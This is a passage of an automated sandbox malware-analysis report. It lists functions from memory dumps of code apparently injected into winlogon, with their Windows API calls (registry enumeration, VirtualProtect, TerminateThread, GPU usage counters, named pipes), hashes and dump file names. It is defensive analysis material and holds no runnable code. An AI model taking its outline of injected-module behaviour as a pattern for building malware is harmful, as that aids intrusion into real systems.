Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6

SleepEx.KERNELBASE ref: 000001CA7D1E1BDF

Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E191C
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E199C

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 7242aede8837696ec19541534e1c3dce86efc3bfd9bee90a47d931ad18d557f5
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: D5312177A8070941FB529B22E940BE933A5BF44BC9F8A44618E0AC7295EE12C4D093F7

Function 000001CA7D1EF370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001CA7D1EF390

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: bead2ac1358e17f089f294fb4c756c1d3e3800fd4e757aed294e48ae8c095ac3
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: 58D01236B32644C3F301DB51D855BD67729FB98705FC04005E94982694DF7DC259CF92

Function 000001CA7D21F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001CA7D21F390

Memory Dump Source

Source File: 0000002A.00000002.2579209671.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 0000002A.00000002.2578132456.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2580862945.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2582107054.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2583463080.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2584654752.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: 96736f0284182aa4837be0ebcb41d10c413a553dbe389820e9d30482321e3cc7
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: CFD0C936B3164483F3019B11D845BD56228BB98705FC04005E949826948F7DC25ACB92

Non-executed Functions

Function 000001CA7D1EDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001CA7D1EDB99
FindNextFileW.KERNEL32 ref: 000001CA7D1EDCCF
FindClose.KERNEL32 ref: 000001CA7D1EDD0F
FindClose.KERNEL32 ref: 000001CA7D1EDD3B

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: bca9c8bf826c505011b38fd6b5f6bfe9104125b42424f6945c05f756906d2787
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: C8A10633B4478849FB229B75E440BED7BA0BB81B9DF9C4115DA492BA95DA36C041C343

Function 000001CA7D1E34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D1E3516
GetProcessHeap.KERNEL32 ref: 000001CA7D1E3527
HeapAlloc.KERNEL32 ref: 000001CA7D1E3535
PdhGetCounterInfoW.PDH ref: 000001CA7D1E354B
StrCmpW.SHLWAPI ref: 000001CA7D1E3560

Part of subcall function 000001CA7D1E3950: StrCmpNW.SHLWAPI ref: 000001CA7D1E3972
Part of subcall function 000001CA7D1E3950: StrStrW.SHLWAPI ref: 000001CA7D1E3990
Part of subcall function 000001CA7D1E3950: StrToIntW.SHLWAPI ref: 000001CA7D1E39B7

GetProcessHeap.KERNEL32 ref: 000001CA7D1E358D
HeapFree.KERNEL32 ref: 000001CA7D1E359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001CA7D1E3559

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 8eab24d6d6144954bd2ca5cd0d15ee39b50dab67e5137aa515f9043b1a9d6d94
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 07318433A50B4986F712DF12E854B9973E1BF84F9AF8440259E4A43724DF39D542C782

Function 000001CA7D1EA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001CA7D1EA289

Part of subcall function 000001CA7D1EB144: __GetUnwindTryBlock.LIBCMT ref: 000001CA7D1EB187
Part of subcall function 000001CA7D1EB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001CA7D1EB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001CA7D1EA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001CA7D1EA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001CA7D1EA6BC

Strings

csm, xrefs: 000001CA7D1EA2A3
csm, xrefs: 000001CA7D1EA30A
csm, xrefs: 000001CA7D1EA384

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 9fc1314c1b3568874932ff714da4d78103fade56a62ede063e1102c62ff8e334
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: E8D18B73A447888AFB22DF659540BDD7BA0FB4979DF900205EE8957B96CB35C480C783

Function 000001CA7D1E2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D1E20A6
TlsFree.KERNEL32 ref: 000001CA7D1E225F
TlsFree.KERNEL32 ref: 000001CA7D1E226B
TlsFree.KERNEL32 ref: 000001CA7D1E2277
TlsFree.KERNEL32 ref: 000001CA7D1E2283
TlsFree.KERNEL32 ref: 000001CA7D1E228F

Part of subcall function 000001CA7D1E5E50: GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E5E66

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: dd7d2fbe355015c765db1afd73c3d8f2591a8a07618d104dc6321a3fb9c50056
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 8751C372A81B4995FB07DB24D860AE433A1BF0474EFC40819A52D467A5FF7AC619C3E3

Function 000001CA7D1E35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E36D9
HeapFree.KERNEL32(?,?,?,?,?,000001CA7D1E24D1), ref: 000001CA7D1E36E7

Strings

$rbx-, xrefs: 000001CA7D1E366C

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 53dd2015d23d3b19de732b4b8ca317527b9a6887f52f6010c9b4161ede9a8080
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 2831A233B41B5982F716DF26D544AA973A0BF48F8AF8840208F4807755EF36C5A18383

Function 000001CA7D1E1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001CA7D1E1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D1E1A74
PathFindFileNameW.SHLWAPI ref: 000001CA7D1E1A83
lstrlenW.KERNEL32 ref: 000001CA7D1E1A8F
StrCpyW.SHLWAPI ref: 000001CA7D1E1AA2
CloseHandle.KERNEL32 ref: 000001CA7D1E1AB0

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: a292ab2cfa75126c4a735770990b9ca6806856f301d60702c71bca0c6d7b623e
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: B9016D32B45B8482FB11DB12E868B9973A1FB88FC8F8940349E5E43754DE3DC685C792

Function 000001CA7D1E3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001CA7D1E3AAC), ref: 000001CA7D1E3EAE

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: c63064200cc5015cd9426516bf03d8a10638c949921e829e67ac36650152cb9d
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 8C012176B5274882FB269B61E458F9573B0FF44B4AF840024D94D46358EF3EC549C793

Function 000001CA7D1E5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E5E66

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
Instruction ID: fa9a5d2907fee9bc4b961baced023eb20950943a2e523218285e0907ba0ddb00
Opcode Fuzzy Hash: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
Instruction Fuzzy Hash: 1F61F633969B4886F761CB15E550B9AB7E0FB88749F900115FA8D43BA8DB3EC540CB83

Function 000001CA7D1E8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D1E8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CA7D1E8D62
RtlUnwindEx.NTDLL ref: 000001CA7D1E8DBC

Strings

csm, xrefs: 000001CA7D1E8D49

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 60e8b9d452b22d8066b229c291e107fc67761e130e05b0da0dcc3cb05f5680b7
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 2B51E533B917888AFB59CB15E044FAC7791FB94B9DF948110EA4A47B88D77AC841C783

Function 000001CA7D1E14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E14C6
HeapFree.KERNEL32 ref: 000001CA7D1E14D5
GetProcessHeap.KERNEL32 ref: 000001CA7D1E14E2
HeapFree.KERNEL32 ref: 000001CA7D1E14F1
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1501

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 067d4f9d96a6597854837632812c8a5965103370f5823a428bd146fe93ab2a8e
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 3F01AD73A45B84CAF715DF62E80458877B0FB88F85B464025DF4A43718DF35E191C382

Function 000001CA7D1E8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001CA7D1E80BC
GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E80CA
GetCurrentProcessId.KERNEL32 ref: 000001CA7D1E80D6
QueryPerformanceCounter.KERNEL32 ref: 000001CA7D1E80E6

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 2ffd8be48935f38640984e0e891f6a1c018a3ddb3dfbf4d3b2fca621978af583
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 14113C36B51F088AFB00CF60E8547E833A4FB59758F840E21DA6D86BA4EF78C1558382

Function 000001CA7D1E25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D1E26C2
StrCpyW.SHLWAPI ref: 000001CA7D1E26D9

Strings

\\.\pipe\, xrefs: 000001CA7D1E26CD

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 543a74f7f096710a94370db433aa404daddb7db03a989235164fc2747e9da801
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 9C513837E8479841F626CE25A464BEA7791FBA8B89FD40069DD4943B89DE37C500C7C3

Function 000001CA7D1F2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001CA7D1F2778
GetLastError.KERNEL32 ref: 000001CA7D1F279D

Strings

U, xrefs: 000001CA7D1F2722

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

